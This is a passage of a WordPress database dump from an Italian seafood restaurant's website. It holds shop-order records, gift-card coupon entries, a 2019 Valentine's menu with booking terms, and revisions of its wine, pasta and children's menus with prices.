PM','','wc-processing','closed','closed','order_5c1170fd25c52','ordine-dec-12-2018-0835-pm','','','2018-12-14 15:07:56','2018-12-14 14:07:56','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=716',0,'shop_order','',2),(717,1,'2018-12-14 15:07:23','2018-12-14 14:07:23','[mwb_check_your_gift_card_balance]','Gift Card Balance','','publish','closed','closed','','gift-card-balance','','','2018-12-14 15:07:23','2018-12-14 14:07:23','',0,'http://www.ristorantesolymar.it/gift-card-balance/',0,'page','',0),(718,1,'2018-12-14 21:17:35','2018-12-14 20:17:35','','Order &ndash; dicembre 14, 2018 @ 09:17 PM','','wc-processing','open','closed','order_5c140fdff234b','ordine-dec-14-2018-0817-pm','','','2018-12-14 21:20:56','2018-12-14 20:20:56','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=718',0,'shop_order','',2),(719,0,'2018-12-14 21:20:56','2018-12-14 20:20:56','GIFTCARD ORDER #718','solymarcouponOQ2IH','GIFTCARD ORDER #718','publish','closed','closed','','solymarcouponoq2ih','','','2018-12-14 21:20:56','2018-12-14 20:20:56','',0,'https://www.ristorantesolymar.it/2018/12/14/solymarcouponoq2ih/',0,'shop_coupon','',0),(720,1,'2018-12-16 15:18:02','2018-12-16 14:18:02','','Order &ndash; dicembre 16, 2018 @ 03:18 PM','','wc-completed','open','closed','order_5c165e9ab4a1c','ordine-dec-16-2018-0218-pm','','','2018-12-16 15:28:08','2018-12-16 14:28:08','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=720',0,'shop_order','',3),(721,0,'2018-12-16 15:20:52','2018-12-16 14:20:52','GIFTCARD ORDER #720','solymarcouponONKIF','GIFTCARD ORDER #720','publish','closed','closed','','solymarcoupononkif','','','2018-12-16 15:20:52','2018-12-16 14:20:52','',0,'https://www.ristorantesolymar.it/2018/12/16/solymarcoupononkif/',0,'shop_coupon','',0),(722,1,'2018-12-27 11:32:31','2018-12-27 10:32:31','','Order &ndash; dicembre 27, 2018 @ 11:32 AM','','wc-processing','open','closed','order_5c24aa3fa1cc2','ordine-dec-27-2018-1032-am','','','2018-12-27 11:34:11','2018-12-27 10:34:11','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=722',0,'shop_order','',2),(723,0,'2018-12-27 11:34:11','2018-12-27 10:34:11','GIFTCARD ORDER #722','solymarcoupon2FZIE','GIFTCARD ORDER #722','publish','closed','closed','','solymarcoupon2fzie','','','2018-12-27 11:34:11','2018-12-27 10:34:11','',0,'https://www.ristorantesolymar.it/2018/12/27/solymarcoupon2fzie/',0,'shop_coupon','',0),(724,1,'2018-12-27 11:39:19','2018-12-27 10:39:19','','Order &ndash; dicembre 27, 2018 @ 11:39 AM','','wc-processing','open','closed','order_5c24abd712cde','ordine-dec-27-2018-1039-am','','','2018-12-27 11:40:55','2018-12-27 10:40:55','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=724',0,'shop_order','',2),(725,0,'2018-12-27 11:40:55','2018-12-27 10:40:55','GIFTCARD ORDER #724','solymarcoupon6KMQS','GIFTCARD ORDER #724','publish','closed','closed','','solymarcoupon6kmqs','','','2018-12-27 11:40:55','2018-12-27 10:40:55','',0,'https://www.ristorantesolymar.it/2018/12/27/solymarcoupon6kmqs/',0,'shop_coupon','',0),(727,2,'2019-02-01 10:31:21','2019-02-01 09:31:21','<strong><em>Ogni scusa è buona per uscire a cena...</em></strong>\r\n\r\nMenù:\r\nBattuto di pesce azzurro con pomodori secchi e spuma di bufala\r\nFiletto di pagro , carciofi al tegame e pesto alla menta\r\nSeppiolino spadellato nel suo ragù e variazione di topinambur\r\nBottoni di patate viola con mazzancolle nostrane e spinacini\r\nInsalatina di astice e canocchie al lime su crema all\'astice e latte di cocco\r\ntropical\r\n\r\n50€ a persona bevande escluse\r\n\r\nOrario di inizio 20,30\r\n(non si accettano prenotazioni dopo le 21,30)\r\n\r\nPrenota online il tuo tavolo:\r\n[product_category category=\"san-valentino\"]\r\n\r\n<strong>Modalità di prenotazione online per la cena di San Valentino 2019</strong>\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va \"tassativamente\" compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 20,00 di martedì 12 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n\r\nPrenota online il tuo tavolo:\r\n[product_category category=\"san-valentino\"]','Menù di San Valentino 2019','','publish','open','open','','menu-di-san-valentino-2019','','','2019-02-01 11:36:42','2019-02-01 10:36:42','',0,'https://www.ristorantesolymar.it/?p=727',0,'post','',0),(728,1,'2019-02-01 10:29:00','2019-02-01 09:29:00','','san-valentino-2019','','inherit','open','closed','','san-valentino-2019','','','2019-02-01 10:29:00','2019-02-01 09:29:00','',727,'https://www.ristorantesolymar.it/wp-content/uploads/2019/02/san-valentino-2019.jpg',0,'attachment','image/jpeg',0),(729,1,'2019-02-01 10:31:21','2019-02-01 09:31:21','<img src=\"https://www.ristorantesolymar.it/wp-content/uploads/2019/02/san-valentino-2019-300x300.jpg\" alt=\"\" width=\"300\" height=\"300\" class=\"alignright size-medium wp-image-728\" /><em>Ogni scusa è buona per uscire a cena...</em>\r\n\r\nMenù:\r\nBattuto di pesce azzurro con pomodori secchi e spuma di bufala\r\nFiletto di pagro , carciofi al tegame e pesto alla menta\r\nSeppiolino spadellato nel suo ragù e variazione di topinambur\r\nBottoni di patate viola con mazzancolle nostrane e spinacini\r\nInsalatina di astice e canocchie al lime su crema all\'astice e latte di cocco\r\ntropical\r\n\r\n50€ a persona bevande escluse','Menù di San Valentino 2019','','inherit','closed','closed','','727-revision-v1','','','2019-02-01 10:31:21','2019-02-01 09:31:21','',727,'https://www.ristorantesolymar.it/2019/02/01/727-revision-v1/',0,'revision','',0),(730,1,'2019-02-01 10:32:27','2019-02-01 09:32:27','<strong><em>Ogni scusa è buona per uscire a cena...</em></strong>\r\n\r\nMenù:\r\nBattuto di pesce azzurro con pomodori secchi e spuma di bufala\r\nFiletto di pagro , carciofi al tegame e pesto alla menta\r\nSeppiolino spadellato nel suo ragù e variazione di topinambur\r\nBottoni di patate viola con mazzancolle nostrane e spinacini\r\nInsalatina di astice e canocchie al lime su crema all\'astice e latte di cocco\r\ntropical\r\n\r\n50€ a persona bevande escluse','Menù di San Valentino 2019','','inherit','closed','closed','','727-revision-v1','','','2019-02-01 10:32:27','2019-02-01 09:32:27','',727,'https://www.ristorantesolymar.it/2019/02/01/727-revision-v1/',0,'revision','',0),(731,1,'2019-02-01 10:49:17','2019-02-01 09:49:17','<strong><em>Ogni scusa è buona per uscire a cena...</em></strong>\n\nMenù:\nBattuto di pesce azzurro con pomodori secchi e spuma di bufala\nFiletto di pagro , carciofi al tegame e pesto alla menta\nSeppiolino spadellato nel suo ragù e variazione di topinambur\nBottoni di patate viola con mazzancolle nostrane e spinacini\nInsalatina di astice e canocchie al lime su crema all\'astice e latte di cocco\ntropical\n\n50€ a persona bevande escluse\n\nOrario di inizio 20,30\n(non si accettano prenotazioni dopo le 21,30)\n\n<strong>Modalità di prenotazione online per la cena di San Valentino 2019</strong>\n\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso,nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va \"tassativamente\" compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 20,00 di martedi 12 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\nLa ricevuta del pagamento, vale come conferma di prenotazione\nAcquistando il tavolo si accettano le condizioni sopracitate.\nGrazie per la comprensione\nTeo & Barbara','Menù di San Valentino 2019','','inherit','closed','closed','','727-autosave-v1','','','2019-02-01 10:49:17','2019-02-01 09:49:17','',727,'https://www.ristorantesolymar.it/2019/02/01/727-autosave-v1/',0,'revision','',0),(732,1,'2019-02-01 10:49:33','2019-02-01 09:49:33','<strong><em>Ogni scusa è buona per uscire a cena...</em></strong>\r\n\r\nMenù:\r\nBattuto di pesce azzurro con pomodori secchi e spuma di bufala\r\nFiletto di pagro , carciofi al tegame e pesto alla menta\r\nSeppiolino spadellato nel suo ragù e variazione di topinambur\r\nBottoni di patate viola con mazzancolle nostrane e spinacini\r\nInsalatina di astice e canocchie al lime su crema all\'astice e latte di cocco\r\ntropical\r\n\r\n50€ a persona bevande escluse\r\n\r\nOrario di inizio 20,30\r\n(non si accettano prenotazioni dopo le 21,30)\r\n\r\n<strong>Modalità di prenotazione online per la cena di San Valentino 2019</strong>\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va \"tassativamente\" compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 20,00 di martedì 12 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara','Menù di San Valentino 2019','','inherit','closed','closed','','727-revision-v1','','','2019-02-01 10:49:33','2019-02-01 09:49:33','',727,'https://www.ristorantesolymar.it/2019/02/01/727-revision-v1/',0,'revision','',0),(733,1,'2019-02-01 11:36:42','2019-02-01 10:36:42','<strong><em>Ogni scusa è buona per uscire a cena...</em></strong>\r\n\r\nMenù:\r\nBattuto di pesce azzurro con pomodori secchi e spuma di bufala\r\nFiletto di pagro , carciofi al tegame e pesto alla menta\r\nSeppiolino spadellato nel suo ragù e variazione di topinambur\r\nBottoni di patate viola con mazzancolle nostrane e spinacini\r\nInsalatina di astice e canocchie al lime su crema all\'astice e latte di cocco\r\ntropical\r\n\r\n50€ a persona bevande escluse\r\n\r\nOrario di inizio 20,30\r\n(non si accettano prenotazioni dopo le 21,30)\r\n\r\nPrenota online il tuo tavolo:\r\n[product_category category=\"san-valentino\"]\r\n\r\n<strong>Modalità di prenotazione online per la cena di San Valentino 2019</strong>\r\nLa disponibilità dei tavoli con la relativa capienza, è riportata in basso, nel caso in cui non vi siano tavoli relativi al numero di persone richieste, è possibile acquistare più tavoli fino ad ottenere il numero desiderato. La scheda va \"tassativamente\" compilata per intero, specificando nome di chi prenota e numero di cellulare raggiungibile, nonché eventuali allergie o intolleranze.\r\nLa prenotazione si può cancellare e di conseguenza si può ricevere il rimborso della caparra entro e non oltre le 20,00 di martedì 12 febbraio, solo ed esclusivamente mediante telefonata al ristorante(non saranno considerate valide altre forme di contatto, ne disdette dopo il suddetto orario) , dopo tale data, la caparra pagata diventerà rimborso in caso di no show.\r\nLa ricevuta del pagamento, vale come conferma di prenotazione\r\nAcquistando il tavolo si accettano le condizioni sopracitate.\r\nGrazie per la comprensione\r\nTeo & Barbara\r\n\r\nPrenota online il tuo tavolo:\r\n[product_category category=\"san-valentino\"]','Menù di San Valentino 2019','','inherit','closed','closed','','727-revision-v1','','','2019-02-01 11:36:42','2019-02-01 10:36:42','',727,'https://www.ristorantesolymar.it/2019/02/01/727-revision-v1/',0,'revision','',0),(734,1,'2019-02-01 19:02:19','2019-02-01 18:02:19','','Order &ndash; Febbraio 1, 2019 @ 07:02 PM','','wc-processing','open','closed','wc_order_RqYxbWSehyhzh','ordine-feb-01-2019-0602-pm','','','2019-02-01 19:03:38','2019-02-01 18:03:38','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=734',0,'shop_order','',3),(735,1,'2019-02-02 07:30:42','2019-02-02 06:30:42','','Order &ndash; Febbraio 2, 2019 @ 07:30 AM','','wc-processing','open','closed','wc_order_Fn0SPYlnkfyEs','ordine-feb-02-2019-0630-am','','','2019-02-02 07:31:56','2019-02-02 06:31:56','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=735',0,'shop_order','',3),(736,1,'2019-02-02 12:28:06','2019-02-02 11:28:06','','Order &ndash; Febbraio 2, 2019 @ 12:28 PM','','wc-cancelled','open','closed','wc_order_apEmt9YG4iCNo','ordine-feb-02-2019-1128-am','','','2019-02-02 13:27:20','2019-02-02 12:27:20','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=736',0,'shop_order','',1),(737,1,'2019-02-04 10:34:27','2019-02-04 09:34:27','','Order &ndash; Febbraio 4, 2019 @ 10:34 AM','','wc-processing','open','closed','wc_order_lXSrjA4PkJk7s','ordine-feb-04-2019-0934-am','','','2019-02-04 10:36:25','2019-02-04 09:36:25','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=737',0,'shop_order','',3),(738,1,'2019-02-05 18:43:09','2019-02-05 17:43:09','','Order &ndash; Febbraio 5, 2019 @ 06:43 PM','','wc-cancelled','open','closed','wc_order_Sms1daR1lwz3B','ordine-feb-05-2019-0543-pm','','','2019-02-05 19:45:14','2019-02-05 18:45:14','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=738',0,'shop_order','',1),(739,1,'2019-02-06 07:38:50','2019-02-06 06:38:50','','Order &ndash; Febbraio 6, 2019 @ 07:38 AM','','wc-processing','open','closed','wc_order_dk5eYBC6TqdES','ordine-feb-06-2019-0638-am','','','2019-02-06 07:40:32','2019-02-06 06:40:32','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=739',0,'shop_order','',3),(740,1,'2019-02-07 20:45:28','2019-02-07 19:45:28','','Order &ndash; Febbraio 7, 2019 @ 08:45 PM','','wc-processing','open','closed','wc_order_cPQ8CmKmd5QQe','ordine-feb-07-2019-0745-pm','','','2019-02-07 20:48:03','2019-02-07 19:48:03','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=740',0,'shop_order','',3),(741,1,'2019-02-08 14:59:42','2019-02-08 13:59:42','','Order &ndash; Febbraio 8, 2019 @ 02:59 PM','','wc-refunded','open','closed','wc_order_MxtybU5nK0iR1','ordine-feb-08-2019-0159-pm','','','2019-02-12 19:27:42','2019-02-12 18:27:42','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=741',0,'shop_order','',4),(743,1,'2019-02-10 13:10:52','2019-02-10 12:10:52','','Order &ndash; Febbraio 10, 2019 @ 01:10 PM','','wc-processing','open','closed','wc_order_UDpaxciXaxk7z','ordine-feb-10-2019-1210-pm','','','2019-02-10 13:12:36','2019-02-10 12:12:36','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=743',0,'shop_order','',3),(744,1,'2019-02-10 23:04:14','2019-02-10 22:04:14','','Order &ndash; Febbraio 10, 2019 @ 11:04 PM','','wc-processing','open','closed','wc_order_vVKSPXPntoRpf','ordine-feb-10-2019-1004-pm','','','2019-02-10 23:05:03','2019-02-10 22:05:03','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=744',0,'shop_order','',3),(745,1,'2019-02-11 10:40:28','2019-02-11 09:40:28','','Order &ndash; Febbraio 11, 2019 @ 10:40 AM','','wc-processing','open','closed','wc_order_y4jFQmCBBWPFs','ordine-feb-11-2019-0940-am','','','2019-02-11 10:43:29','2019-02-11 09:43:29','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=745',0,'shop_order','',3),(746,1,'2019-02-11 11:50:45','2019-02-11 10:50:45','','Order &ndash; Febbraio 11, 2019 @ 11:50 AM','','wc-processing','open','closed','wc_order_rF70Y7m4U6t8I','ordine-feb-11-2019-1050-am','','','2019-02-11 11:52:39','2019-02-11 10:52:39','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=746',0,'shop_order','',3),(747,2,'2020-10-24 22:53:16','2020-10-24 20:53:16','<p style=\"text-align: center\"><strong><u>LE NOSTRE PROPOSTE AL BICCHIERE</u></strong></p>\n<p style=\"text-align: center\"><strong>BIANCHI</strong></p>\n<strong> </strong>\n\nMarotti Campi                      Albiano Verdicchio dei castelli di Jesi Doc 2018             € 4,oo\n\nLuigi Maffini                           Kratos Fiano D.o.P   ‘16                                                       € 5,oo\n\nKossler                                  Gewurztraminer   Trentino Alto Adige Doc ‘19                  € 6,oo\n\nCeretto                                       Blangè                                                                                    € 5,oo\n\n&nbsp;\n\nRonco dei Tassi                     Ribolla Gialla (cormons)                                                       € 6,oo\n\nBachelet Monnot                     Bourgogne Blanc                                                                  € 6,oo\n\n&nbsp;\n<p style=\"text-align: center\"><strong>BOLLICINE</strong></p>\n&nbsp;\n\nAdami                    Prosecco Superiore D.o.c.g. Valdobbiadene                                      € 7, oo\n\nMajolini               Saten millesimato D.o.c.g                                                                       € 7, oo\n\n&nbsp;\n<p style=\"text-align: center\"><strong>ROSSI</strong></p>\nFico Grande Romagna Doc               Sangiovese Podere Nespoli                                    € 4,oo\n\n&nbsp;\n<p style=\"text-align: center\"></p>\n<p style=\"text-align: center\"><strong>Vino della ” casa “</strong></p>\n<strong> </strong>\n\nMarotti Campi    Albiano Verdicchio Doc dei castelli di Jesi           Bott. 0,750 l                           € 15,oo\n\nVallona              Pignoletto Frizzante D.O.C. Bott. 0,750 l                                               € 17,oo\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;\n\n&nbsp;','Vini al bicchiere','','inherit','closed','closed','','106-autosave-v1','','','2020-10-24 22:53:16','2020-10-24 20:53:16','',106,'https://www.ristorantesolymar.it/2019/02/12/106-autosave-v1/',0,'revision','',0),(748,2,'2019-02-12 13:48:35','2019-02-12 12:48:35','<strong>VINO DELLA CASA</strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nMarotti Campi        Albiano Verdicchio dei castelli di Jesi  Bott.  O, 750 l           € 10,00\r\n\r\nVallona                     Pignoletto Frizzante D.O.C. Bott.     O,750 l                            € 14,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLE NOSTRE PROPOSTE AL BICCHIERE\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>BIANCHI</strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nMarotti Campi               Albiano Verdicchio dei castelli di Jesi         “17            € 3,00\r\n\r\nKossler                            Gewurztraminer                                                “18           € 4,00\r\n\r\nCamminera                    Adarya Vermentino.                                         “17           € 4,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong> </strong>\r\n\r\n<strong>ROSSI</strong>\r\n\r\n<strong>Per il rosso del giorno chiedere al cameriere    </strong>                                                         € 4,00','Vini al bicchiere','','inherit','closed','closed','','106-revision-v1','','','2019-02-12 13:48:35','2019-02-12 12:48:35','',106,'https://www.ristorantesolymar.it/2019/02/12/106-revision-v1/',0,'revision','',0),(749,2,'2019-02-12 13:51:31','2019-02-12 12:51:31','<p style=\"text-align: left\"><strong>VINO DELLA CASA</strong></p>\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nMarotti Campi        Albiano Verdicchio dei castelli di Jesi  Bott.  O, 750 l           € 10,00\r\n\r\nVallona                     Pignoletto Frizzante D.O.C. Bott.     O,750 l                      € 14,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLE NOSTRE PROPOSTE AL BICCHIERE\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>BIANCHI</strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nMarotti Campi               Albiano Verdicchio dei castelli di Jesi         “17           € 3,00\r\n\r\nKossler                     Gewurztraminer                                  “18           € 4,00\r\n\r\nCamminera                   Adarya Vermentino.                              “17           € 4,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong> </strong>\r\n\r\n<strong>ROSSI</strong>\r\n\r\n<strong>Per il rosso del giorno chiedere al cameriere    </strong>                                                         € 4,00','Vini al bicchiere','','inherit','closed','closed','','106-revision-v1','','','2019-02-12 13:51:31','2019-02-12 12:51:31','',106,'https://www.ristorantesolymar.it/2019/02/12/106-revision-v1/',0,'revision','',0),(750,2,'2019-02-12 13:55:08','2019-02-12 12:55:08','<p style=\"text-align: left\"><strong>VINO DELLA CASA</strong></p>\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nMarotti Campi        Albiano Verdicchio dei castelli di Jesi  Bott.  O, 750 l           € 10,00\r\n\r\nVallona                     Pignoletto Frizzante D.O.C. Bott.     O,750 l                      € 14,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\nLE NOSTRE PROPOSTE AL BICCHIERE\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong>BIANCHI</strong>\r\n\r\n<strong> </strong>\r\n\r\n<strong> </strong>\r\n\r\nMarotti Campi               Albiano Verdicchio dei castelli di Jesi         “17           € 3,00\r\n\r\nKossler                            Gewurztraminer                                              “18           € 4,00\r\n\r\nCamminera                    Adarya Vermentino.                                       “17           € 4,00\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n<strong> </strong>\r\n\r\n<strong>ROSSI</strong>\r\n\r\n<strong>Per il rosso del giorno chiedere al cameriere    </strong>                                                         € 4,00','Vini al bicchiere','','inherit','closed','closed','','106-revision-v1','','','2019-02-12 13:55:08','2019-02-12 12:55:08','',106,'https://www.ristorantesolymar.it/2019/02/12/106-revision-v1/',0,'revision','',0),(751,2,'2019-02-12 14:04:23','2019-02-12 13:04:23','<em>La Pasta</em>\r\n\r\n<em>Gli spaghettini del “ Pastificio dei Campi di Gragnano Igp “ con ostriche ,burro dolce e mela verde </em>\r\n\r\n<em>€13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>I passatelli al bianco di crostacei, lime e salicornia </em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le linguine del “ Pastificio Mancini” con crema di peperoni dolci,</em>\r\n\r\n<em>tonno affumicato e bottarga fatta da noi </em>\r\n\r\n<em>€ 13,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Gli gnocchi di patate alla carbonara di triglia affumicata e tartufo </em>\r\n\r\n<em>€ 14,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>I tortelli ripieni di patate e stracciatella di bufala con ragù di astice ,pomodorini e basilico</em>\r\n\r\n<em>€ 16,00</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le tagliatelle al ragù…. Di Pesce </em>\r\n\r\n<em>€13,00 </em>\r\n\r\n<em> </em>\r\n\r\n<em>Il risotto “ Carnaroli Acquerello “ tradizionale alla marinara *Min. 2 porz. – tempo di cottura 30’</em>\r\n\r\n<em>€ 13,oo a porzione</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em>Bis di primi piatti *esclusi risotto e spaghettini con ostriche *min. 2 porz</em>\r\n\r\n<em>€ 15,oo a porzione</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<em> Per i vegetariani e vegani </em>\r\n\r\n<em> </em>\r\n\r\n<em>Gli spaghettini del Pastificio dei Campi di Gragnano con pomodori confit ed erbe aromatiche</em>\r\n\r\n<em>€ 11,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Gli strozzapreti con ragù di seitan (vegano)</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le linguine del “Pastificio Mancini” alla carbonara (vegano)</em>\r\n\r\n<em>€ 10,oo</em>\r\n\r\n<em> </em>\r\n\r\n<em> Secondo legge N. art 145 .Nel nostro ristorante possono essere utilizzati prodotti surgelati all’origine(Gamberi e Calamari)tuttavia è nostro scrupolo selezionare anche in questo caso, sempre la qualità migliore</em>\r\n\r\n<em> </em>\r\n\r\n&nbsp;\r\n\r\n&nbsp;','La Pasta','','inherit','closed','closed','','51-revision-v1','','','2019-02-12 14:04:23','2019-02-12 13:04:23','',51,'https://www.ristorantesolymar.it/2019/02/12/51-revision-v1/',0,'revision','',0),(752,2,'2019-02-12 14:08:52','2019-02-12 13:08:52','<em>Per i piccoli ospiti…</em>\n\n<em> </em>\n\n<em> </em>\n\n<strong><em>Menù Spiderman &amp; Principesse”</em></strong>\n\n<em>Gnocchetti al Ragù o pomodoro </em>\n\n<em>Cotoletta con patate fritte</em>\n\n<em>Gelato € 20 </em>\n\n<strong><em>Menù “Capitan Uncino”</em></strong>\n\n<em>Gnocchetti di patate alle vongole</em>\n\n<em>Sogliola alla griglia patate fritte</em>\n\n<em>Gelato€ 22,00 </em>\n\n<strong><em>Menù “Peter Pan “</em></strong>\n\n<em>Tortellini alla panna o al ragù</em>\n\n<em>Bistecchina di entrecote con patate fritte</em>\n\n<em>Gelato€ 22,00 </em>\n\n<em>I menù sono acquistabili solo per i piccoli ospiti(non per gli adulti)</em>\n\n<em> </em>\n\n<strong><em>Alla carta</em></strong>\n\n<strong><em>Primi piatti</em></strong>\n\n<em>Gnocchi al pomodoro                                                                                                          € 9,oo</em>\n\n<em>Gnocchi al ragù                                                                                                                    € 10,oo</em>\n\n<em>Gnocchi alle vongole                                                                                                           € 11,oo</em>\n\n<em>Spaghetti alle vongole                                                                                                      €13,oo</em>\n\n<em>Tortellini alla panna                                                                                                            € 10,oo</em>\n\n<em>Tortellini al ragù                                                                                                                € 10,oo</em>\n\n<strong><em>Secondi piatti</em></strong>\n\n<em>Cotoletta con patate fritte                                                                                                 € 13,oo</em>\n\n<em>Sogliola alla griglia con patate fritte                                                                               € 14,00</em>\n\n<em>Bistecchina di entrcote con patate fritte                                                                     € 14,00</em>\n\n<em>Carote a filino                                                                                                                   € 4,00</em>\n\n<em>Coperto bimbi                                                                                                                 € 2,oo</em>\n\n<em> </em>','Menù Bambini','','inherit','closed','closed','','14-autosave-v1','','','2019-02-12 14:08:52','2019-02-12 13:08:52','',14,'https://www.ristorantesolymar.it/2019/02/12/14-autosave-v1/',0,'revision','',0),(753,2,'2019-02-12 14:09:53','2019-02-12 13:09:53','<em>Per i piccoli ospiti…</em>\r\n\r\n<em> </em>\r\n\r\n<em> </em>\r\n\r\n<strong><em>Menù Spiderman &amp; Principesse”</em></strong>\r\n\r\n<em>Gnocchetti al Ragù o pomodoro </em>\r\n\r\n<em>Cotoletta con patate fritte</em>\r\n\r\n<em>Gelato € 20 </em>\r\n\r\n<strong><em>Menù “Capitan Uncino”</em></strong>\r\n\r\n<em>Gnocchetti di patate alle vongole</em>\r\n\r\n<em>Sogliola alla griglia patate fritte</em>\r\n\r\n<em>Gelato€ 22,00 </em>\r\n\r\n<strong><em>Menù “Peter Pan “</em></strong>\r\n\r\n<em>Tortellini alla panna o al ragù</em>\r\n\r\n<em>Bistecchina di entrecote con patate fritte</em>\r\n\r\n<em>Gelato€ 22,00 </em>\r\n\r\n<em>I menù sono acquistabili solo per i piccoli ospiti(non per gli adulti)</em>\r\n\r\n<em> </em>\r\n\r\n<strong><em>Alla carta</em></strong>\r\n\r\n<strong><em>Primi piatti</em></strong>\r\n\r\n<em>Gnocchi al pomodoro                                                                                                          € 9,oo</em>\r\n\r\n<em>Gnocchi al ragù                                                                                                                    € 10,oo</em>\r\n\r\n<em>Gnocchi alle vongole                                                                                                           € 11,oo</em>\r\n\r\n<em>Spaghetti alle vongole                                                                                                        €13,oo</em>\r\n\r\n<em>Tortellini alla panna                                                                                                          € 10,oo</em>\r\n\r\n<em>Tortellini al ragù                                                                                                                 € 10,oo</em>\r\n\r\n<strong><em>Secondi piatti</em></strong>\r\n\r\n<em>Cotoletta con patate fritte                                                                                                 € 13,oo</em>\r\n\r\n<em>Sogliola alla griglia con patate fritte                                                                             € 14,00</em>\r\n\r\n<em>Bistecchina di entrcote con patate fritte                                                                       € 14,00</em>\r\n\r\n<em>Carote a filino                                                                                                                     € 4,00</em>\r\n\r\n<em>Coperto bimbi                                                                                                                     € 2,oo</em>\r\n\r\n<em> </em>','Menù Bambini','','inherit','closed','closed','','14-revision-v1','','','2019-02-12 14:09:53','2019-02-12 13:09:53','',14,'https://www.ristorantesolymar.it/2019/02/12/14-revision-v1/',0,'revision','',0),(754,2,'2019-02-12 14:12:37','2019-02-12 13:12:37','<em>Antipasti </em>\r\n\r\n<em> </em>\r\n\r\n<em>La piccola degustazione di antipasti, un crudo e due cotti secondo mercato</em>\r\n\r\n<em>(Min. 2 porzioni)</em>\r\n\r\n<em>€ 19,0oo cad.</em>\r\n\r\n<em> </em>\r\n\r\n<em>Le tagliatelle di 